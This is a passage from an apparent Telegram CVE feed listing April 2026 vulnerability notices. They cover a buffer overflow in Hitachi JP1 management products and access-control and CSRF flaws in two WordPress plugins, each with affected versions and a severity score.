Description :Buffer Overflow Vulnerability in JP1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management 2 - Operations Director on Windows, Job Management Partner 1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management - Manager on Windows, Job Management Partner 1/IT Desktop Management - Manager on Windows, JP1/NETM/DM Manager on Windows, JP1/NETM/DM Client on Windows, Job Management Partner 1/Software Distribution Manager on Windows, Job Management Partner 1/Software Distribution Client on Windows. This issue affects JP1/IT Desktop Management 2 - Manager: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; JP1/IT Desktop Management 2 - Operations Director: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; Job Management Partner 1/IT Desktop Management 2 - Manager: from 10-50 through 10-50-11; JP1/IT Desktop Management - Manager: from 09-50 through 10-10-16; Job Management Partner 1/IT Desktop Management - Manager: from 09-50 through 10-10-16; JP1/NETM/DM Manager: from 09-00 through 10-20-02; JP1/NETM/DM Client: from 09-00 through 10-20-02; Job Management Partner 1/Software Distribution Manager: from 09-00 through 09-51-13; Job Management Partner 1/Software Distribution Client: from 09-00 through 09-51-13.
Severity: 5.5 | MEDIUM
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-34896 - WordPress Under Construction, Coming Soon & Maintenance Mode plugin <= 2.1.1 - cross site request forgery (csrf) vulnerability",
"Content": "CVE ID :CVE-2026-34896
Published : April 7, 2026, 9:16 a.m. | 25 minutes ago
Description :Cross-Site Request Forgery (CSRF) vulnerability in Analytify Under Construction, Coming Soon & Maintenance Mode allows Cross Site Request Forgery. This issue affects Under Construction, Coming Soon & Maintenance Mode: from n/a through 2.1.1.
Severity: 7.5 | HIGH
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹
{
"Source": "CVE FEED",
"Title": "CVE-2026-34899 - WordPress LTL Freight Quotes – Worldwide Express Edition plugin <= 5.2.1 - broken access control vulnerability",
"Content": "CVE ID :CVE-2026-34899
Published : April 7, 2026, 9:16 a.m. | 25 minutes ago
Description :Missing Authorization vulnerability in Eniture technology LTL Freight Quotes – Worldwide Express Edition allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects LTL Freight Quotes – Worldwide Express Edition: from n/a through 5.2.1.
Severity: 5.3 | MEDIUM
Visit the link for more details, such as CVSS details, affected products, timeline, and more...",
"Detection Date": "07 Apr 2026",
"Type": "Vulnerability"
}
🔹 t.me/cvedetector 🔹